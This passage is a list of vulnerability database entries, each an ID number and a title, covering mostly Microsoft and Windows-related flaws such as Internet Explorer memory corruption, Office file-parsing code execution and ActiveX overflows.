Data Memory Functions Arbitrary Code Execution [51834] Microsoft Office Visio File Opening Object Data Handling Arbitrary Code Execution [51531] Apple QuickTime MPEG-2 Playback Component on Windows Crafted Movie File Handling Arbitrary Code Execution [51503] Microsoft Word Save as PDF Add-on Emailed PDF Path Disclosure [51406] Silentum Uploader on Windows upload.php delete Parameter Traversal Arbitrary File Deletion [51351] Oracle Database SQLPlus Windows GUI Unspecified Remote Information Disclosure (2008-3973) [51350] Oracle Database SQLPlus Windows GUI Unspecified Remote Information Disclosure (2008-5439) [51320] Microsoft IE chromehtml: URI --renderer-path Option Arbitrary Command Execution [51277] Microsoft Excel HTML Tag Interpretation XSS [51259] Microsoft IE onload=screen[&quot [51226] IBM AS/400 iSeries Access for Windows Remote Command rexec Remote Command Execution [51190] Firefly Media Server (mt-daapd) on Windows Traversal Arbitrary /admin-root File Disclosure [51135] Google Chrome on Windows chromehtml: URI--renderer-path Option Arbitrary Remote Command Execution [50978] Opera on Windows Malformed Email Header Handling Resource Consumption DoS [50974] Microsoft Outlook Express InetComm.dll MimeOleClearDirtyTree Function Malformed Email Header Handling Infinite Loop DoS [50959] Microsoft Word / Publisher Malformed wordart Handling DoS [50778] Microsoft Remote Help SAFRCFileDlg.RASetting ActiveX (safrcdlg.dll) GetProfileString Function Overflow [50745] Microsoft Office Web Controls OWC11.DataSourceControl Memory Access Violation [50727] Hitachi JP1/Integrated Management Service Support on Windows Unspecified XSS [50693] Sun Ray Windows Connector Unspecified Local Administration Password Disclosure [50683] CA ARCserve Backup on Windows LDBserver Service Client Data Verification Weakness [50622] Microsoft IE mshtml.dll XSML Nested SPAN Element Handling Unspecified Arbitrary Code Execution [50615] Microsoft ASP.NET Malformed File Request Path Disclosure [50613] Microsoft IE WebDAV Cached Content Request Parsing Overflow [50612] Microsoft IE Object Handling Uninitialized Memory Corruption [50611] Microsoft IE Navigation Methods Parameter Validation Memory Corruption [50610] Microsoft IE EMBED Tag File Name Extension Overflow [50598] Microsoft Office Word Table Property Handling Overflow [50597] Microsoft Office Word RTF Object Parsing Arbitrary Code Execution (2008-4031) [50596] Microsoft Office Word RTF Object Parsing Arbitrary Code Execution (2008-4030) [50595] Microsoft Office Word RTF Drawing Object Parsing Overflow [50593] Microsoft Office Word RTF Consecutive Drawing Object Parsing Memory Corruption [50592] Microsoft Office Word Malformed Value Memory Corruption [50591] Microsoft Office Word RTF Polyline/Polygon Object Parsing Overflow [50590] Microsoft Office Word Malformed File Information Block (FIB) lcbPlcfBkfSdt' Field Memory Corruption [50589] Microsoft SQL Server 2000 sp_replwritetovarbin() Stored Procedure Overflow [50585] Microsoft Office SharePoint Server Administrative URL Security Bypass [50581] Microsoft Visual Basic Charts Control ActiveX (Mschrt20.ocx) Unspecified Memory Corruption [50580] Microsoft Visual Basic Animation ActiveX (mscomct2.ocx) AVI Parsing Memory Corruption [50579] Microsoft Visual Basic Hierarchical FlexGrid ActiveX (mshflxgd.ocx) Multiple Method Memory Corruption [50578] Microsoft Visual Basic FlexGrid ActiveX (msflxgrd.ocx) Unspecified Memory Corruption [50577] Microsoft Visual Basic DataGrid ActiveX (msdatgrd.ocx) Unspecified Memory Corruption [50557] Microsoft Excel NAME Record Global Array Parsing Memory Corruption [50556] Microsoft Excel Malformed Object Record Parsing Memory Corruption [50555] Microsoft Excel Malformed Formula Parsing Memory Corruption [50488] Microsoft Multiple Products Crafted RTCP Receiver Report Packet Handling Remote DoS [50330] Microsoft Communicator Instant Message Emoticon Saturation Remote DoS [50320] Microsoft Communicator SIP INVITE Request Handling Session Saturation DoS [50302] Microsoft .NET Framework Strong Name Implementation DLL File Public Key Token Subversion Multiple Mechanism Authentication Bypass [50288] Apple iPhone Configuration Web Utility for Windows Traversal Arbitrary File Access [50279] Microsoft XML Core Services HTTP Request Header Field Cross-domain Session State Manipulation [50138] Microsoft SharePoint Host Name / Port Number Persistence HTML Document Same-origin Relationship Bypass XSS [50074] Cisco Unity Unspecified Microsoft API Dynamic UDP Port Packet Handling Remote DoS [50044] Microsoft IE Non-Blocking Space Character Visual Truncation Address Bar Spoofing [50043] Microsoft IE High-bit URL Encoded Character Address Bar Spoofing [49981] Symantec Backup Exec for Windows Server Data Management Protocol Unspecified Overflow [49980] Symantec Backup Exec for Windows Server Authentication Multiple Unspecified Issues [49926] Microsoft XML Core Services DTD Crafted XML Document Handling Cross-Domain Scripting Remote Information Disclosure [49900] Windows Mobile on HTC Hermes Password Auto-Completion Authentication Bypass [49899] Microsoft IIS iissext.dll Unspecified ActiveX SetPassword Method Remote Password Manipulation [49882] Opera on Windows file:// URI Handling Overflow [49781] Adobe Flash Player on Windows ActiveX Unspecified Information Disclosure [49743] Yosemite Backup on Windows ytwindtb.dll DtbClsLogin() Function Remote Overflow [49730] Microsoft IIS ActiveX (adsiis.dll) GetObject Method Remote DoS [49729] Microsoft Internet Authentication Service (IAS) Helper COM Component ActiveX (iashlpr.dll) PutProperty Method Remote DoS [49728] Microsoft IE Crafted URL-encoded String alert Function DoS [49592] Microsoft Office DjVu ActiveX (DjVu_ActiveX_MSOffice.dll) Multiple Property Overflow [49590] Microsoft Debug Diagnostic Tool DebugDiag ActiveX (CrashHangExt.dll) GetEntryPointForThread Method DoS [49586] Microsoft IE Mshtml.dll CDwnTaskExec::ThreadExec Function PNG File Handling DoS [49442] IBM Tivoli Storage Manager (TSM) Express for Microsoft SQL SQL CAD Data Protection (dsmcat.exe) Remote Overflow [49385] Microsoft ASP.NET Request Validation &lt [49384] Microsoft ASP.NET Request Validation &lt [49230] Microsoft Outlook Web Access (OWA) exchweb/bin/redir.asp URL Variable Arbitrary Site Redirect [49118] Microsoft IE HTML Object Handling Memory Corruption [49117] Microsoft IE componentFromPoint Unitialized Memory Corruption [49116] Microsoft IE Unspecified Cross-domain Information Disclosure [49115] Microsoft IE Unspecified Cross-domain Arbitrary Script Execution [49114] Microsoft IE Unspecified HTML Element Cross-Domain Code Execution [49113] Microsoft IE Window Location Property Cross-Domain Code Execution [49082] Microsoft PicturePusher ActiveX (PipPPush.DLL) Crafted PostURL Request Multiple Method Arbitrary File Upload [49078] Microsoft Excel Embedded Formula Parsing Arbitrary Code Execution [49077] Microsoft Excel Calendar Object Validation VBA Performance Cache Processing Arbitrary Code Execution [49076] Microsoft Excel BIFF File Malformed Object Handling Arbitrary Code Execution [49068] Microsoft Host Integration Server (HIS) SNA RPC Request Remote Overflow [49059] Microsoft IIS IPP Service Unspecified Remote Overflow [49052] Microsoft Office CDO Protocol (cdo:) Content-Disposition: Attachment Header XSS [48821] Microsoft Dynamics GP DPS Component DPS Message Remote Overflow [48820] Microsoft Dynamics GP DPM Component DPM Message Remote Overflow [48819] Microsoft Dynamics GP DPS Message Invalid Magic Number Remote DoS [48818] Microsoft IE Top Level Domain Cross-Domain Cookie Fixation [48564] Apple Mac OS X QuickLook Microsoft Office File Handling Memory Corruption [48243] ISC BIND for Windows UDP Client Handler Remote DoS [48220] Microsoft SQL Server SQLVDIRLib.SQLVDirControl ActiveX (Tools\Binn\sqlvdir.dll) Connect Method Overflow [48208] Novell eDirectory LDAP on Windows Unspecified Memory Corruption DoS [48206] Novell eDirectory NDS on Windows Unspecified Remote Memory Corruption [48149] IBM DB2 Universal Database on Windows DB2FMP Unspecified Issue [48034] Apple QuickTime on Windows PICT Image Handling Overflow [48032] Apple QuickTime on Windows PICT Image Handling Unspecified Arbitrary Code Execution [48020] Apple Bonjour for Windows mDNSResponder Bonjour API for Unicast DNS TransactionID/Port Randomness Prediction [48019] Apple Bonjour for Windows Bonjour Namespace Provider mDNSResponder Domain Name Label Handling DoS [48000] Microsoft Organization Chart orgchart.exe Crafted OPX File Handling DoS [47969] Microsoft Multiple Products GDI+ BMP Integer Calculation Overflow [47968] Microsoft Multiple Products GDI+ WMF Image Handling Overflow [47967] Microsoft Multiple Products GDI+ GIF Image Handling Arbitrary Code Execution [47966] Microsoft Multiple Products GDI+ EMF File Handling Memory Corruption [47965] Microsoft Multiple Products GDI+ VML Gradient Size Handling Overflow [47964] Microsoft Office OneNote Protocol Handler (onenote://) URI Handling Arbitrary Code Execution [47903] DiskCryptor on Windows BIOS Keyboard Buffer Local Password Disclosure [47856] Microsoft BitLocker BIOS Keyboard Buffer Local Password Disclosure [47475] Microsoft Visual Studio Masked Edit Control ActiveX (Msmask32.ocx) Mask Parameter Overflow [47447] RealVNC Windows Client vncviewer.exe Crafted Frame Buffer Update Packet Handling DoS [47419] Microsoft IE HTML Object Unspecified Memory Corruption [47418] Microsoft IE HTML Object Unspecified Memory Corruption [47417] Microsoft IE Object Handling Uninitialized Memory Corruption [47416] Microsoft IE HTML Document Objects Handling Memory Corruption [47415] Microsoft IE HTML Document Object Handling Memory Corruption [47414] Microsoft IE Print Preview HTML Component Handling Unspecified Arbitrary Code Execution [47413] Microsoft IE MHTML Protocol Handler Cross-Domain Information Disclosure [47410] Microsoft Office Excel connections.xml Password String Persistence [47409] Microsoft Office Excel Spreadsheet AxesSet Record Memory Corruption [47408] Microsoft Office Excel File FORMAT Record Array Index Handling Arbitrary Code Execution [47407] Microsoft Office Excel File COUNTRY Record Value Parsing Arbitrary Code Execution [47406] Microsoft PowerPoint Viewer Cstring Object Handling Memory Corruption [47405] Microsoft PowerPoint Viewer Picture Index Handling Memory Corruption [47404] Microsoft PowerPoint File List Value Handling Memory Corruption [47402] Microsoft Office Filters PICT File Handling Arbitrary Code Execution [47401] Microsoft Office Filters Encapsulated PostScript (EPS) File Handling Arbitrary Code Execution [47400] Microsoft Office BMPIMP32.FLT Filter BMP File Header Handling Arbitrary Code Execution [47398] Microsoft Office Filters PICT File bits_per_pixel Field Heap Corruption [47397] Microsoft Office WPGIMP32.FLT Filter WordPerfect Graphics (WPG) File Handling Arbitrary Code Execution [47299] Frisk F-PROT Antivirus Microsoft Office File Handling DoS [47004] Microsoft Crypto API S/MIME X.509 Certificate CRL Check Remote Information Disclosure [46935] Microsoft IE Pop Up Blocker Multiple Issues [46931] Microsoft Outlook/Express Unspecified URI Handling Arbitrary Command Injection [46914] Microsoft Word DOC File Handling Unspecified Arbitrary Code Execution [46827] Microsoft Visual Basic ActiveX (vb6skit.dll) fCreateShellLink Function Crafted lpstrLinkPath Argument Overflow [46780] Microsoft Outlook Web Access (OWA) HTML Parsing Unspecified XSS [46779] Microsoft Outlook Web Access (OWA) Data Validation Unspecified XSS [46773] Microsoft SQL Server Memory Page Reuse Information Disclosure [46772] Microsoft SQL Server Convert Function Overflow [46771] Microsoft SQL Server Stored Backup File Processing Memory Corruption Arbitrary Code Execution [46770] Microsoft SQL Server Crafted Insert Statement Overflow [46749] Microsoft Access Snapshot Viewer ActiveX (snapview.ocx) PrintSnapshot Method Arbitrary Code Execution [46723] Cisco VPN Client on Windows Dial-up Networking Dialog Local Privilege Escalation [46722] Apple Safari for Windows Crafted HTML Arbitrary File Download [46696] Opera for Windows Unspecified Arbitrary Code Execution [46676] Mozilla Multiple Browser Windows URL Shortcut Handling Cross-context Execution [46645] Microsoft Word DOC File Unordered List Handling Memory Corruption [46631] Microsoft IE Frame Location Handling Cross-frame Content Manipulation [46630] Microsoft IE location Window Object Handling XSS [46590] Avaya Message Storage Server (MSS) Admin Interface Windows Domain Parameter Arbitrary Command Execution [46501] Apple Safari for Windows URLACTION_SHELL_EXECUTE_HIGHRISK IE Zone Setting Restriction Bypass [46400] SurgeMail on Windows Unspecified Remote Issue (ZD-00000078) [46275] Sun Java on Windows jusched.exe Unspecified Overflow [46240] No-IP Windows Dynamic Update Client Registry Local Credentials Disclosure [46194] Novell iPrint Client for Windows ienipp.ocx ActiveX Multiple Variable Overflow [46084] Microsoft IE Request Header Handling Cross-domain Information Disclosure [46083] Microsoft IE HTML Object Handling Memory Corruption Arbitrary Code Execution [46065] Microsoft DirectX SAMI File Format Processing Arbitrary Code Execution [46064] Microsoft DirectX MJPEG Codec AVI/ASF File Processing Arbitrary Code Execution [45941] HP System Management Homepage (SMH) for Windows OpenSSL Version Regression [45906] Microsoft ISA Server SOCKS4 Proxy Empty Packet Cross Session Destination IP Disclosure [45826] Microsoft IE Local Zone Saved File URI XSS [45814] Microsoft IE Arbitrary Website Zone Addition Domain Supression DoS [45813] Microsoft IE URI Arbitrary Scheme Name XSS Filter Bypass [45806] Microsoft Register Server (REGSVR) Crafted DLL Handling Unspecified Issue [45583] Microsoft IIS w/ Visual Interdev Unspecified Authentication Bypass [45525] Microsoft IE Failed Connection DNS Pin Dropping Rebinding Weakness [45522] Symantec Veritas Backup Exec for Windows Unspecified Remote Issue [45517] Windows Mobile PC SMS Handler SMS Message Sender Field Spoofing [45442] Microsoft IE IObjectSafety Java Plug-in ActiveX COM Object Creation DoS [45441] Microsoft IE IObjectSafety CLSID_ApprenticeICW ActiveX Control COM Object Creation DoS [45440] Microsoft IE IObjectSafety SmartConnect Class ActiveX Control COM Object Creation DoS [45439] Microsoft IE IObjectSafety System Monitor Source Properties ActiveX Control COM Object Creation DoS [45438] Microsoft IE IObjectSafety Outlook Progress Ctl ActiveX Control COM Object Creation DoS [45437] Microsoft IE Location DOM Object Page Load Interruption Site/Certificate Spoofing [45436] Microsoft IE URI Unspecified Scheme Traversal Arbitrary File Access [45435] Microsoft IE file: URI Absolute Traversal Arbitrary File Access [45354] Stunnel on Windows Unspecified Local Privilege Escalation [45264] Microsoft Office Publisher File Format Unspecified Remote Code Execution [45262] Microsoft ISA Server Host Header Log File Content Injection [45260] Microsoft IE Malformed Table Element CSS Attribute Handling DoS [45259] Microsoft IE mshtml.dll Malformed IFRAME XML File / XSL Stylesheet Handling DoS [45248] Microsoft IE JavaScript onUnload Document Structure Modification DoS [45218] Microsoft Outlook Web Access Cache-Control Directive Information Caching Persistence [45185] Microsoft Baseline Security Analyzer (MBSA) Reboot Race Condition Weakness [45074] Microsoft IE Print Table of Links Cross-Zone Scripting [45033] Microsoft Publisher Object Handler Header Data Validation Arbitrary Code Execution [45032] Microsoft Word Document Malformed CSS Handling Memory Corruption Arbitrary Code Execution [45031] Microsoft Office RTF File Handling Object Parsing Arbitrary Code Execution [45028] Microsoft Malware Protection Engine File Parsing Disk-space Exhaustion DoS [45027] Microsoft Malware Protection Engine File Parsing Service DoS [45008] Microsoft Outlook E-mail Message Malformed Header / Body Separation Remote DoS [44979] Microsoft SQL Server Blank sa Password Set Weakness [44973] Microsoft IE DisableCachingOfSSLPages SSL Page Caching Persistence [44964] Apple QuickTime Player on Windows Crafted Media File Arbitrary Code Execution [44963] IBM DB2 Universal Database on Windows Multiple Function JAR File Handling Remote DoS [44959] Microsoft Office on Mac OS X Installation Permission Bypass [44938] Microsoft Office Open XML (OOXML) Document Metadata Field Modification Signature Weakness [44721] IBM DB2 Universal Database Windows Change Password Policy Bypass [44652] Microsoft HeartbeatCtl HRTBEAT.OCX ActiveX Unspecified Method Host Argument Overflow [44597] Oracle Application Server on Windows Crafted URI Remote DoS [44527] Oracle Application Server on Windows Installation Default Permission Weakness [44459] Microsoft Sharepoint Rich Text Editor Picture Source XSS [44458] Microsoft Works WkImgSrv.dll WksPictureInterface Property Remote DoS [44319] Microsoft Office Publisher Crafted PUB File Handling DoS [44318] Trend Micro ServerProtect for Windows (SpntSvc.exe) StRpcSrv.dll Arbitrary Remote Code Execution [44303] Microsoft IE body Tag Infinite Loop DoS [44212] Microsoft Project File Handling Unspecified Arbitrary Code Execution [44211] Microsoft Vbscript.dll VBScript Decoding Code Execution [44210] Microsoft Jscript.dll JScript Arbitrary Code Execution [44205] Microsoft IE Data Stream Handling Memory Corruption [44170] Microsoft Visio DXF File Handling Memory Validation Arbitrary Code Execution [44169] Microsoft Visio Object Header Data Handling Arbitrary Code Execution [44150] Microsoft Access Crafted MDB File Handling Overflow [44004] Apple QuickTime on Windows Movie Animation Codec Handling Overflow [44002] Apple QuickTime on Windows PICT Handling Clip opcode Parsing Overflow [43606] Microsoft IE XMLHttpRequest() Multiple Header Overwrite HTTP Response Splitting [43605] Microsoft IE Chunked Transfer-Encoding Request Smuggling [43602] FutureSoft TFTP Server 2000 for Windows UDP Request Handling Remote Overflow [43521] Microsoft IE CSS :visited Pseudo-class Browser History Disclosure [43471] Microsoft IE Digest Authentication username Attribute CRLF Injection [43464] Microsoft Jet Database Engine Word File Handling Unspecified Code Execution [43451] Microsoft IIS HTTP Request Smuggling [43325] Microsoft Atlas Framework JavaScript Object Notation (JSON) Crafted HTML Remote Data Disclosure [43314] Microsoft IE JavaScript Long String Regex Match Remote DoS [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption [43242] Novell GroupWise Windows Client API Shared Folder Security Bypass [43076] Acronis True Image Windows Agent Malformed Packet Remote DoS [43068] Microsoft Access MDB File Handling Unspecified Arbitrary Code Execution [42978] Double-Take for Windows username Field Remote Overflow [42977] Double-Take for Windows ospace/time/src\date.cpp Exception Remote DoS [42976] Double-Take for Windows Crafted Request CPU Consumption Remote DoS [42975] Double-Take for Windows Malformed Packet NULL Dereference Remote DoS [42974] Double-Take for Windows Crafted Packet Memory Allocation Error Remote DoS [42973] Double-Take for Windows Crafted Packet Remote Information Disclosure [42972] Double-Take for Windows Crafted Packet Function Recursion Remote DoS [42799] Microsoft IE URI Handling Arbitrary FTP Command Injection [42732] Microsoft Excel Macro Validation Unspecified Code Execution [42731] Microsoft Excel Conditional Formatting Value Unspecified Code Execution [42730] Microsoft Excel BIFF File Format Rich Text Tag Malformed Tag Memory Corruption [42725] Microsoft Excel XLS Malformed Formula Memory Corruption [42724] Microsoft Excel Style Record Handling Memory Corruption [42723] Microsoft Excel SLK File Import Unspecified Arbitrary Code Execution [42722] Microsoft Excel BIFF8 Spreadsheet DVAL Record Handling Arbitrary Code Execution [42712] Microsoft Office Web Components DataSource Page Handling Arbitrary Code Execution [42711] Microsoft Office Web Components URL Parsing Arbitrary Code Execution [42710] Microsoft Outlook mailto: URI Handling Arbitrary Command Execution [42709] Microsoft Office Unspecified Malformed Document Handling Memory Corruption [42708] Microsoft Office Excel Document (XLS) Cell Record Rebuilding Memory Corruption [42360] Symantec Backup Exec for Windows Servers (BEWS) PVATLCalendar.PVCalendar.1 ActiveX (pvcalendar.ocx) Save() Method Arbitrary File Manipulation [42358] Symantec Backup Exec for Windows Servers (BEWS) PVATLCalendar.PVCalendar.1 ActiveX (pvcalendar.ocx) Multiple Overflows [42329] Symantec Backup Exec for Windows Servers (BEWS) Unspecified Remote Issue [42193] VLC Media Player on Windows RTSP Data Handling Unspecified Remote Overflow [42152] Microsoft Silverlight ActiveX Unspecified Overflow [42058] Microsoft FrontPage CERN Image Map Dispatcher (htimage.exe) Arbitrary File Information Disclosure [41871] Mono on Windows System.Web StaticFileHandler.cs Crafted Request Source Code Disclosure [41775] PHP Component Object Model (COM) on Windows Multiple Restriction Bypass [41727] Windows Privacy Tray (WinPT) Crafted Key Installation Visual Truncation Weakness [41628] IBM Informix Storage Manager (ISM) Windows RPC Components XDR Library Multiple Unspecified Remote Overflows [41621] IBM Informix Dynamic Server (IDS) on Windows Unspecified SQ_ONASSIST Request Remote DoS [41468] Microsoft FoxPro ActiveX Web Page Parsing Unspecified Memory Corruption [41467] Microsoft IE Image Processing Argument Validation Unspecified Memory Corruption [41466] Microsoft IE animateMotion.by SVG Element by Property Memory Corruption [41465] Microsoft IE HTML Layout Rendering Unspecified Memory Corruption [41464] Microsoft Word Document Handling Unspecified Memory Corruption [41462] Microsoft Office Malformed Object Parsing Memory Corruption [41461] Microsoft Active Directory / ADAM Malformed LDAP Request Remote DoS [41460] Microsoft WebDAV Mini-Redirector Response Handling Arbitrary Code Execution [41459] Microsoft Works File Converter .wps File Multiple Field Handling Arbitrary Code Execution [41458] Microsoft Works File Converter .wps File Header Index Table Handling Arbitrary Code Execution [41457] Microsoft Works File Converter .wps Format Header Handling Arbitrary Code Execution [41456] Microsoft IIS File Change Handling Local Privilege Escalation [41447] Microsoft Office Publisher Memory Index Validation .pub File Handling Arbitrary Code Execution [41446] Microsoft Office Publisher .pub File Handling Arbitrary Code Execution [41445] Microsoft IIS ASP Web Page Input Unspecified Arbitrary Code Execution [41382] Microsoft IE OnKeyDown JavaScript htmlFor Attribute Keystroke Disclosure [41377] F-Secure Anti-Virus for Windows system32 Directory Crafted File Detection Bypass [41091] Microsoft IIS webhits.dll Hit-Highlighting Authentication Bypass [41080] Microsoft Visual Database Tools MSVDTDatabaseDesigner7 ActiveX (VDT70.DLL) NotSafe Function Arbitrary Code Execution [41063] Microsoft IIS ODBC Tool newdsn.exe Remote DSN Creation [41060] Microsoft .NET Unspecified XSS Filter Bypass [41057] Microsoft IIS w/ .NET MS-DOS Device Request Blacklist Bypass [41053] Microsoft Visual Basic vbp File Company Name Field Processing Overflow [41052] Microsoft Visual Basic vbp File Description Field Processing Overflow [41048] Microsoft IE Content-Disposition HTML File Handling XSS [41047] Microsoft IE mshtml Malformed HTML Tag DoS [41041] Microsoft IE Mouse Click self.resizeTo DoS [41040] Microsoft IE onclick Self Referencing Button Infinite Loop DoS [41036] Microsoft IE DLL Search Path Subversion Local Privilege Escalation [41035] Microsoft IE onload Localhost DoS [41026] Microsoft IE GET Request Overflow [41025] Microsoft IE Drag and Drop Arbitrary Program Execution [41024] Microsoft IE Cross Zone Domain Resolution Weakness [40882] Apple Safari on Windows Bookmark Title Overflow [40872] Cisco VPN Client on Windows Dial-up Networking cvpnd.exe Permission Weakness Local Privilege Escalation [40865] Symantec Backup Exec for Windows Servers (BEWS) Job Engine (bengine.exe) Crafted Packet Remote DoS [40735] Apple Mac OS X Microsoft Office Spotlight Importer XLS Handling Memory Corruption [40531] Microsoft Visual Basic DSR File Handling Remote Code Execution [40434] Apple Quicktime for Windows Crafted QTL File qtnext Field Remote Command Execution [40381] Microsoft Visual FoxPro VFP_OLE_Server ActiveX foxcommand Method Arbitrary Code Execution [40380] Microsoft Visual FoxPro ActiveX (vfp6r.dll) DoCmd Method Arbitrary Command Execution [40352] Microsoft Visual InterDev SLN File Long Project Line Arbitrary Code Execution [40344] Microsoft Excel Malformed Header File Handling Remote Code Execution [40271] phPay on Windows main.php config Parameter Traversal Local File Inclusion [40256] Windows NT FTP Server (WFTP) Explorer LIST Command Long Reply Arbitrary Remote Code Execution [40234] Microsoft Rich Textbox Control (RICHTX32.OCX) SaveFile Method Arbitrary File Overwrite [40125] Motorola Timbuktu Pro for Windows Scanner Function HELLO Response Packet Remote Overflow [40124] Motorola Timbuktu Pro for Windows Authentication Username Remote Overflow [40123] Motorola Timbuktu Pro for Windows Application Protocol Request Unspecified Remote Overflow [40121] Motorola Timbuktu Pro for Windows Send Request Traversal Arbitrary File Manipulation [40119] Subversion on Windows Filename Repository Filename Traversal Arbitrary File Overwrite [40118] TortoiseSVN on Windows Filename Traversal Arbitrary File Overwrite [40091] VMware Multiple Products Windows Search Path Subversion Local Privilege Escalation [39900] Microsoft Web Proxy Auto-Discovery (WPAD) Crafted DNS MitM Weakness [39754] Trend Micro ServerProtect for Windows (SpntSvc.exe) Notification.dll NTF_SetPagerNotifyConfig Function Remote Overflow [39753] Trend Micro ServerProtect for Windows (SpntSvc.exe) Eng50.dll Multiple Function Remote Overflow [39752] Trend Micro ServerProtect for Windows (SpntSvc.exe) Stcommon.dll Multiple Function Remote Overflow [39751] Trend Micro ServerProtect for Windows (SpntSvc.exe) StRpcSrv.dll Multiple Function Remote Overflow [39750] Trend Micro ServerProtect for Windows Agent Service RPCFN_CopyAUSrc Function Remote Overflow [39707] Toribash Server on Windows Malformed Command Remote DoS [39562] AMD ATI atidsmxx.sys on Windows Vista Local Privilege Escalation [39358] Ingres on Windows Persistent User Privilege Remote Privilege Escalation [39255] Windows Vista UACE Local Privilege Escalation [39250] X Windows (X11) Unspecified HTML Processing DoS [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure [39121] Microsoft IE DHTML Object Memory Corruption [39120] Microsoft IE Element Tag Uninitialized Memory Corruption [39119] Microsoft IE Object cloneNode / nodeValue Function Uninitialized Memory Corruption [39118] Microsoft IE Object setExpression Function Memory Corruption [38955] Microsoft IE history.length Variable History Disclosure [38954] Microsoft Excel Sheet Name Unspecified Code Execution [38953] Microsoft IE Document Variable Overwrite Same Origin Policy Bypass [38869] Apple Safari for Windows corefoundation.dll History Error Remote DoS [38866] Apple Safari for Windows Unspecified Memory Corruption DoS (crash #2) [38864] Apple Safari for Windows feed:// URL DoS [38572] Windows RSH daemon (rshd) Packet Processing Remote Overflow [38542] Apple Safari for Windows IFRAME SRC Arbitrary Command Execution [38541] Apple Safari for Windows Unspecified DHTML Manipulation Remote DoS [38497] Microsoft IE Page Transaction Race Condition Arbitrary Code Execution [38496] Microsoft Sysinternals DebugView Dbgv.sys Local Privilege Escalation [38495] Microsoft IE Outlook Express Address Book Activex DoS [38493] Microsoft IE HTML Popup Window (mshtml.dll) DoS [38488] Microsoft ISA Server File Extension Filter Bypass [38487] Microsoft Visual FoxPro ActiveX (FPOLE.OCX) FoxDoCmd Function Arbitrary Command Execution [38486] Microsoft Expression Media IVC File Cleartext Catalog Password Disclosure [38471] Microsoft Office MSODataSourceControl ActiveX DeleteRecordSourceIfUnused Method Overflow [38399] Microsoft SQL Server Enterprise Manager Distributed Management Objects OLE DLL ActiveX (sqldmo.dll) Start Method Arbitrary Code Execution [38212] Microsoft IE document.open() Function Address Bar Spoofing [38211] Microsoft IE with Netscape navigatorurl URI Cross-browser Command Execution [38018] Microsoft IE with Mozilla SeaMonkey Cross-browser Command Execution [38017] Microsoft IE with Mozilla Firefox Cross-browser Command Execution [37992] Atheros 802.11 Wireless Driver on Windows Management Frame Handling DoS [37817] Windows NT Message Compiler MC-filename Local Overflow [37764] Sun Java JDK / JRE on Windows Untrusted Application Arbitrary File Access [37638] Microsoft IE res:// URI Image Object Local File Enumeration [37636] Microsoft IE Crafted JavaScript for Loop Null Pointer DoS [37634] Microsoft Word Crafted Document Unspecified Resource Consumption DoS [37633] Microsoft Word wwlib.dll Crafted Document Overflow DoS [37632] Microsoft Word Unspecified Memory Corruption [37630] Microsoft SharePoint PATH_INFO (query string) XSS [37626] Microsoft IE Unspecified Address Bar Spoofing [37625] Microsoft IE File Download Queue Handling Use-After-Free Arbitrary Code Execution [37590] WIDCOMM Bluetooth for Windows (BTW) Traversal Arbitrary File Manipulation [37589] WIDCOMM Bluetooth for Windows (BTW) Remote Communication Interception (CarWhisperer) [37383] ZoneAlarm Pro Windows API Function Identifier Manipulation Local Policy Bypass [37375] Comodo Firewall Pro Windows API Function Identifier Manipulation Local Policy Bypass [37250] Sun Java System (SJS) Application Server on Windows Unspecified JSP Source Disclosure [37148] Microsoft TSAC ActiveX connect.asp Unknown XSS [37107] Microsoft Visual Studio VB To VSI Support Library ActiveX (VBTOVSI.DLL) SaveAs Method Arbitrary File Manipulation [37106] Microsoft Visual Studio ActiveX (PDWizard.ocx) Multiple Method Arbitrary Program Execution [37011] Nessus Windows GUI Unspecified XSS [36936] Microsoft Visual Basic VBP File Handling Overflow [36934] Microsoft Agent URL Handling Remote Code Execution [36605] Apple Safari windows.setTimeout Function XSS [36524] Credant Mobile Guardian Shield for Windows Cleartext Credential Disclosure [36400] Microsoft IE HTML FTP Credential Disclosure [36399] Microsoft DirectX Media SDK DXSurface.LivePicture.FlashPix.1 (DirectTransform FlashPix) ActiveX SourceUrl Property Overflow [36398] Microsoft IE FTP Unspecified Remote Memory Address Disclosure [36397] Microsoft IE Crafted CSS Unspecified Memory Corruption [36396] Microsoft IE ActiveX tblinf32.dll Unspecified Arbitrary Code Execution [36395] Microsoft IE ActiveX (pdwizard.ocx) Unspecified Memory Corruption [36394] Microsoft XML Core Services (MSXML) Multiple Object Handling Overflow [36389] Microsoft Virtual PC Guest Administrator Unspecified Local Privilege Escalation [36383] Microsoft Excel Workspace rtWnDesk Record Memory Corruption [36151] Microsoft DirectX RLE Compressed Targa Image Processing Overflow [36147] Microsoft IE Zone Domain Specification DoS [36142] Microsoft IE IDN Site Basic Authentication Status Bar Truncation Spoofing [36111] Symantec Backup Exec for Windows RPC Crafted ncacn_ip_tcp Request Remote Overflow [36105] Symantec LiveState for Windows shstart.exe Local Privilege Escalation [36089] PHP COM Extensions on Windows WScript.Shell COM Object safe_mode Bypass [36062] Mozilla Firefox on Windows Encoded IP Phishing Protection Bypass [36059] Caucho Resin on Windows Crafted MS-DOS Request DoS [36058] Caucho Resin on Windows \web-inf Traversal Arbitrary File Access [36057] Caucho Resin on Windows Encoded Space (%20) Request Path Disclosure [36041] Fullaspsite Asp Hosting Sitesi windows.asp kategori_id Variable [36034] Microsoft Office 2000 Controllo ActiveX (OUACTRL.OCX) HelpPopup Method Overflow [35959] Microsoft Excel Viewer WorkBook Workspace Designation Memory Corruption [35958] Microsoft Excel Multiple Worksheet Unspecified Memory Corruption [35957] Microsoft Excel Version Information Validation Crafted File Arbitrary Code Execution [35956] Microsoft .NET Framework Just In Time (JIT) Compiler Service Unspecified Arbitrary Code Execution [35955] Microsoft .NET Framework NULL Byte URL Arbitrary File Access [35954] Microsoft .NET Framework PE Loader Service Unspecified Arbitrary Code Execution [35953] Microsoft Office Publisher .pub Page Data Handling Arbitrary Code Execution [35950] Microsoft IIS IUSR_Machine Account Arbitrary Non-EXE Command Execution [35922] Mozilla Firefox on Windows resource:// %5C Encoded Traversal Arbitrary File Access [35763] Microsoft PowerPoint Unspecified Arbitrary Code Execution [35568] Microsoft IE Script Variable Length DoS [35517] Mbedthis AppWeb on Windows Mixed Case URL Unspecified Bypass [35353] Microsoft IE Speech API 4 Xlisten.dll / Xvoice.dll Memory Corruption [35352] Microsoft IE navcancl.htm res: URI Phishing [35351] Microsoft IE Unspecified Memory Corruption Arbitrary Code Execution [35350] Microsoft IE Multiple Language Pack Installation Race 